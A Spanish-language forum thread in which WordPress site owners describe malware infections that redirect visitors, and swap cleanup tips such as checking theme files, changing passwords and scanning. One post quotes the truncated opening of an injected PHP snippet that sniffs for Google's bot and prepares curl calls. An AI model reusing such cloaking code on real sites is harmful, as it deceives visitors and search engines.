Protege tu sitio WordPress: cómo eliminar virus que causa perdida de visitas

  • Autor Autor lennuc
  • Fecha de inicio Fecha de inicio
pues ami me ha pasado cuando entro el nod32 me sale un troyano js/iframe y me abre la ventana de descarga de un archivo asi 4378.pdf segun es un archivo pdf pero el nombre esta raro, reemplazo mi plantilla y se quita pero ya la he estado revisando y no veo ningun codigo malo. ya formatie mi pc y actualizado el antivirus y me sigue apareciendo, ya estoy desesperado.
 
Que raro ! nunca había escuchado algo de eso.. gracias por compartirlo..
 
pablorey dijo:
Que raro ! nunca había escuchado algo de eso.. gracias por compartirlo..
Hacer clic para expandir...

Mi primera experiencia con WordPress de frustración fue precisamente porque nos metieron un virus, me tocó eliminar todo el sitio y reinstalar wordpress, porque había cambios hasta en la sopa de wordpress... y bueno, desde ahí trato de usar algún sistema de protección... que hay bastantes (por algo será!!!)
 
ramonjosegn dijo:
Mi primera experiencia con WordPress de frustración fue precisamente porque nos metieron un virus, me tocó eliminar todo el sitio y reinstalar wordpress, porque había cambios hasta en la sopa de wordpress... y bueno, desde ahí trato de usar algún sistema de protección... que hay bastantes (por algo será!!!)
Hacer clic para expandir...

Seguramente.. pero yo generalmente en WP hago webs para clientes que no tienen muchos visitas y menos alguien con ganas de meter un virus.. No sabía que podía ser tan fácil de vulnerar WP.. Abrazo
 
Gracias por el dato, a revisar señores!
 
Vaya, me ha dado miedito ese virus, por que puede dañar seriamente tu SEO, y lo digo seriamente.

¿Cómo darse cuenta de esto?

Qué recomiendan hacer para no ser infectado?
 
Tengo las mismas dudas que MasterWeb, habrá que revisar por si acaso ñ_ñ
 
Estoy infectado en uno de mis blogs pero todo esto ha sido de mucha ayuda! Vere que tal me va!
 
gracias por el dato, checare mi theme a ver si tengo algo
 
Lamentablemente porque estoy algo drogado (medicamentos) no pude leer el 100% de las respuestas, pero de todas formas quiero ayudar si aún no solucionas tu problema.

-Lo más probable es que tu computador sea el que está infectado, y dicho script se sube mediante tu FTP.
-Cambia las contraseñas de todo tu sitio.
-revisa en unmaskparasites en que lugar están posibles infecciones
-Francamente te recomiendo formatear antes de encontrar un antivirus o un anti troyano (no recuerdo el nombre técnico) que impida que se siga subiendo el malware.
-instala todo nuevamente con tu web limpia en el paso 2.

Saludos espero que te sirva.
 
Interesante dato, a revisar el codigo entonces.
 
Revisando ando y afortunadamente no encontre nada malo en mi sitio, de cualquier manera hay que estar prevenidos
 
Generalmente estos tipos meten el codigo malicioso en el header.php o en footer.php, cosa que sea visto en todas las páginas, siempre esten verificando esos archivos, a mi me tienen de casero jaajaj pero he estado respaldando el theme, viendo los permisos del ftp.

También hagan busqueda en el codigo de fuente por la palabra iframe.
 
He descubierto algo, mi código no está en el functions.php como en el caso de algunos de por aquí. En mi caso está(o parte de el) en wp-admin/index.php . Y este el siguiente:
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
.................

He descubierto algo, mi código no está en el functions.php como en el caso de algunos de por aquí. En mi caso está(o parte de el) en wp-admin/index.php . Y este el siguiente:
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
.................



He borrado este código y ha desaparecido el script del index.php que redirigia.

LO interesante y lo que me preocupa ahora es caber cómo han inyectado ese código.
 
Hoy navegando por una de mis paginas, dentro del admin de wordpress, me ha salido una pagina porno o algo así, pero en la barra del navegador seguía la dirección de mi blog, es decir, en la barra aparecía mi web pero el contenido no correspondía. Entonces me he acordado de este post, pero al revisar mi pagina no he encontrado nada raro, así que he instalado una especie de antivirus para wordpress y he realizado un escaneo, he tenido suerte y lo ha detectado, exactamente lo tenia en una pagina que me había creado para los comentarios.
 
Hay que estar conectado o registrado para responder aquí.
Atrás
Arriba